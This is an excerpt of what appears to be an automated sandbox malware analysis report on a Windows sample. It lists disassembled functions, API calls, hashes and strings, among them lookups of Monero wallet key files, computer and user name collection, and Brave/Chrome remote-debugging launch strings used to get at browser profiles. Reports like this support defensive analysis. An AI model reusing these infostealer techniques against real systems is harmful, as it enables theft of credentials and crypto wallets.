                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$AllocFree
                                      • String ID:
                                      • API String ID: 2087232378-0
                                      • Opcode ID: 14d63916fd1cfc00aa3761a85ede7288a752e4610845e4e355ef1d4cddc2f73c
                                      • Instruction ID: 94c6ae647b86cb7afe2123f2dcd97a3332c89bfb4247cd374eeb9d4696069440
                                      • Opcode Fuzzy Hash: 14d63916fd1cfc00aa3761a85ede7288a752e4610845e4e355ef1d4cddc2f73c
                                      • Instruction Fuzzy Hash: 83F08971641314BBE71496A4AC59FAEB79CE705705F300558F604E7280D6719E409664
                                      Function 00111190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00127A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00127AA0
                                        • Part of subcall function 00127A70: RtlAllocateHeap.NTDLL(00000000), ref: 00127AA7
                                        • Part of subcall function 00127A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00127ABF
                                        • Part of subcall function 001279E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001111B7), ref: 00127A10
                                        • Part of subcall function 001279E0: RtlAllocateHeap.NTDLL(00000000), ref: 00127A17
                                        • Part of subcall function 001279E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00127A2F
                                      • ExitProcess.KERNEL32 ref: 001111C6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$Process$AllocateName$ComputerExitUser
                                      • String ID:
                                      • API String ID: 3550813701-0
                                      • Opcode ID: 234e5cb3d2e84596aeba5174ca59564ffdc8701238381847b76995d16668ac01
                                      • Instruction ID: 82dca535f780e33845713de54f10dfdef5866ab12d881b938795988f4c9a2bd1
                                      • Opcode Fuzzy Hash: 234e5cb3d2e84596aeba5174ca59564ffdc8701238381847b76995d16668ac01
                                      • Instruction Fuzzy Hash: 7FE017B590831167CA2873B4BC47B6BB28C5B2435EF040928FA0996182EF25EC618265

                                      Non-executed Functions

                                      Function 0011BE40 Relevance: 58.5, APIs: 26, Strings: 7, Instructions: 730fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00130B32,00130B2F,00000000,?,?,?,00131450,00130B2E), ref: 0011BEC5
                                      • StrCmpCA.SHLWAPI(?,00131454), ref: 0011BF33
                                      • StrCmpCA.SHLWAPI(?,00131458), ref: 0011BF49
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0011C8A9
                                      • FindClose.KERNEL32(000000FF), ref: 0011C8BB
                                      Strings
                                      • Preferences, xrefs: 0011C104
                                      • --remote-debugging-port=9229 --profile-directory=", xrefs: 0011C3B2
                                      • \Brave\Preferences, xrefs: 0011C1C1
                                      • --remote-debugging-port=9229 --profile-directory=", xrefs: 0011C534
                                      • Brave, xrefs: 0011C0E8
                                      • Google Chrome, xrefs: 0011C6F8
                                      • --remote-debugging-port=9229 --profile-directory=", xrefs: 0011C495
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                      • API String ID: 3334442632-1869280968
                                      • Opcode ID: 71ecc36276c7495d5fb6e63aba50f17432c75cb2d84c12dbc53c3349eab782a0
                                      • Instruction ID: ae67fb9deb51074ee3e587d4d77ce9443c9ceaad4888be93a9045fa4363a0512
                                      • Opcode Fuzzy Hash: 71ecc36276c7495d5fb6e63aba50f17432c75cb2d84c12dbc53c3349eab782a0
                                      • Instruction Fuzzy Hash: AC52F6729101189BCB24FB60ED96EEE737DAF64300F8045A9F50A67191EF346B58CF62
                                      Function 00123B00 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • wsprintfA.USER32 ref: 00123B1C
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00123B33
                                      • lstrcat.KERNEL32(?,?), ref: 00123B85
                                      • StrCmpCA.SHLWAPI(?,00130F58), ref: 00123B97
                                      • StrCmpCA.SHLWAPI(?,00130F5C), ref: 00123BAD
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00123EB7
                                      • FindClose.KERNEL32(000000FF), ref: 00123ECC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                      • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                      • API String ID: 1125553467-2524465048
                                      • Opcode ID: 8099aa7b8ef29176a15945bab207f2fea80679e4d1bda5f01473d76d4f5a1a0f
                                      • Instruction ID: ad38a3b56786d8321a52f45906e2c07f5345487afaa90635dcb275b1e093803f
                                      • Opcode Fuzzy Hash: 8099aa7b8ef29176a15945bab207f2fea80679e4d1bda5f01473d76d4f5a1a0f
                                      • Instruction Fuzzy Hash: 12A14F71A00258ABDB35DFA4DC85FEA737DAF58300F044688F61D9A181EB749B98CF61
                                      Function 00124B60 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • wsprintfA.USER32 ref: 00124B7C
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00124B93
                                      • StrCmpCA.SHLWAPI(?,00130FC4), ref: 00124BC1
                                      • StrCmpCA.SHLWAPI(?,00130FC8), ref: 00124BD7
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00124DCD
                                      • FindClose.KERNEL32(000000FF), ref: 00124DE2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s$%s\%s$%s\*
                                      • API String ID: 180737720-445461498
                                      • Opcode ID: 0650bfef83513bc287f03e35a53c8bae5b42c948c7775d6493f1cdf4b2109c3c
                                      • Instruction ID: b63d9bb074b1083bc6c4c27b40d7c2ce192f837fabc7e78ca01cc04ee5c0503c
                                      • Opcode Fuzzy Hash: 0650bfef83513bc287f03e35a53c8bae5b42c948c7775d6493f1cdf4b2109c3c
                                      • Instruction Fuzzy Hash: 4F615971900258ABCB35EBA0EC95FEA737CBF58700F404698F60D96191EB70AB95CF91
                                      Function 001247C0 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 137stringmemoryfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 001247D0
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 001247D7
                                      • wsprintfA.USER32 ref: 001247F6
                                      • FindFirstFileA.KERNEL32(?,?), ref: 0012480D
                                      • StrCmpCA.SHLWAPI(?,00130FAC), ref: 0012483B
                                      • StrCmpCA.SHLWAPI(?,00130FB0), ref: 00124851
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 001248DB
                                      • FindClose.KERNEL32(000000FF), ref: 001248F0
                                      • lstrcat.KERNEL32(?,00E3F910), ref: 00124915
                                      • lstrcat.KERNEL32(?,00E3E4E0), ref: 00124928
                                      • lstrlen.KERNEL32(?), ref: 00124935
                                      • lstrlen.KERNEL32(?), ref: 00124946
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                      • String ID: %s\%s$%s\*$
                                      • API String ID: 671575355-1403936960
                                      • Opcode ID: aca2e09226a40921ee090616516b58ad923be7310fb6b1de5d86b08c80beca99
                                      • Instruction ID: 42ad677c5500471d9661cb87e666119e8d14cdba71f2990ca16f90a249121a18
                                      • Opcode Fuzzy Hash: aca2e09226a40921ee090616516b58ad923be7310fb6b1de5d86b08c80beca99
                                      • Instruction Fuzzy Hash: 295178B1904218ABCB75EB70EC99FED737CAB58300F404698F64996190EB74DB94CF91
                                      Function 001240F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • wsprintfA.USER32 ref: 00124113
                                      • FindFirstFileA.KERNEL32(?,?), ref: 0012412A
                                      • StrCmpCA.SHLWAPI(?,00130F94), ref: 00124158
                                      • StrCmpCA.SHLWAPI(?,00130F98), ref: 0012416E
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 001242BC
                                      • FindClose.KERNEL32(000000FF), ref: 001242D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s
                                      • API String ID: 180737720-4073750446
                                      • Opcode ID: c9d9a43936c26fd675dc368fab95647df8955c8d6685853877808056b8277702
                                      • Instruction ID: 56cd664de63fd7897cab5048bb6e8c92dc3cf91a69f799c8f49f735b3cacc0fb
                                      • Opcode Fuzzy Hash: c9d9a43936c26fd675dc368fab95647df8955c8d6685853877808056b8277702
                                      • Instruction Fuzzy Hash: C95147B1904218ABCB35EBB0ED95EEA737CBF58300F4046DCB64996090EB75AB95CF50
                                      Function 005799B8 Relevance: 19.1, Strings: 14, Instructions: 1607COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: (BW?$*Y;$1|_]$1^$2#g{$3=}7$3<{$]7_$oem$p"z$r[?x$uNe{$w}e}$?~
                                      • API String ID: 0-419826266
                                      • Opcode ID: d5667729f125944b8dcfda5503626f6454591e2de428fdcc843cf63bfacba57c
                                      • Instruction ID: e54616d047d4e85265669439ea21f7324fb1a8967aab913f1d515e88181b1323
                                      • Opcode Fuzzy Hash: d5667729f125944b8dcfda5503626f6454591e2de428fdcc843cf63bfacba57c
                                      • Instruction Fuzzy Hash: F4B217F3A0C2109FE3046E2DEC8567ABBE9EF94720F1A493DEAC4C7744E67558058693
                                      Function 0011EE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • wsprintfA.USER32 ref: 0011EE3E
                                      • FindFirstFileA.KERNEL32(?,?), ref: 0011EE55
                                      • StrCmpCA.SHLWAPI(?,00131630), ref: 0011EEAB
                                      • StrCmpCA.SHLWAPI(?,00131634), ref: 0011EEC1
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0011F3AE
                                      • FindClose.KERNEL32(000000FF), ref: 0011F3C3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\*.*
                                      • API String ID: 180737720-1013718255
                                      • Opcode ID: ba8eac3003882ea7bee6b2b959edd300807ecc1dbd8ce06c73f617e1db26b292
                                      • Instruction ID: 32ce791bb34420fca927e32ad1992a1c471dfb3afffa191fecc67fa8a0c95198
                                      • Opcode Fuzzy Hash: ba8eac3003882ea7bee6b2b959edd300807ecc1dbd8ce06c73f617e1db26b292
                                      • Instruction Fuzzy Hash: 20E118719111289BDB65FB60DDA2EEE733DAF64300F8045E9B50A62092EF306F99CF51
                                      Function 0011DB80 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001315A8,00130BAF), ref: 0011DBEB
                                      • StrCmpCA.SHLWAPI(?,001315AC), ref: 0011DC33
                                      • StrCmpCA.SHLWAPI(?,001315B0), ref: 0011DC49
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0011DECC
                                      • FindClose.KERNEL32(000000FF), ref: 0011DEDE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
